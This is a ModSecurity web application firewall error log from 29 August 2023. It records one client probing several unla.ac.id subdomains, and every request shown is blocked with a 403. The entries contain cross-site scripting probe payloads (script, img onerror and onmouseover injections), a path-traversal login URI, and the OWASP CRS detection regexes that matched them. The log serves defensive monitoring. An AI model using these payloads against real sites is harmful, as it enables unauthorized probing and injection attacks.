ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnn2DkAAAAe"]
[Tue Aug 29 11:52:29.561419 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAmNp7YAAAAQ"]
[Tue Aug 29 11:52:29.577272 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15jcCo-f0AAAoEZPIAAAAB"]
[Tue Aug 29 11:52:29.659720 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15jcCo-f0AAAlUlsAAAAA0"]
[Tue Aug 29 11:52:29.664224 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15jcCo-f0AAAn401cAAAAW"]
[Tue Aug 29 11:52:29.668602 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnTlP0AAAAA"]
[Tue Aug 29 11:52:29.684150 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoN9c4AAAAJ"]
[Tue Aug 29 11:52:29.880535 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnn2DoAAAAe"]
[Tue Aug 29 11:52:29.890869 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoLfFwAAAAG"]
[Tue Aug 29 11:52:30.549200 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAnTlQAAAAAA"]
[Tue Aug 29 11:52:30.567129 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAn401oAAAAW"]
[Tue Aug 29 11:52:30.575236 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAlUlsMAAAA0"]
[Tue Aug 29 11:52:30.590082 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoEZPYAAAAB"]
[Tue Aug 29 11:52:30.664389 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoEZPgAAAAB"]
[Tue Aug 29 11:52:30.666300 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAlUlsUAAAA0"]
[Tue Aug 29 11:52:32.616226 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoPuU4AAAAM"]
[Tue Aug 29 11:52:32.620436 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAnd3HsAAAAI"]
[Tue Aug 29 11:52:32.636332 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoN9d0AAAAJ"]
[Tue Aug 29 11:52:32.637736 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoT7LkAAAAD"]
[Tue Aug 29 11:52:33.563996 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAnjjP4AAAAX"]
[Tue Aug 29 11:52:33.569184 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoO5zsAAAAK"]
[Tue Aug 29 11:52:33.572008 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAnTlQwAAAAA"]
[Tue Aug 29 11:52:33.577714 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAn402AAAAAW"]
[Tue Aug 29 11:52:33.648253 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAjdQdYAAAAZ"]
[Tue Aug 29 11:52:33.648662 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAnjjP8AAAAX"]
[Tue Aug 29 11:52:33.711079 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAnjjQAAAAAX"]
[Tue Aug 29 11:52:33.728634 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoT7LwAAAAD"]
[Tue Aug 29 11:52:33.731788 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoPuVMAAAAM"]
[Tue Aug 29 11:52:33.734355 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoLfG0AAAAG"]
[Tue Aug 29 11:52:33.734847 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAnjjQEAAAAX"]
[Tue Aug 29 11:52:33.755173 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAoPuVQAAAAM"]
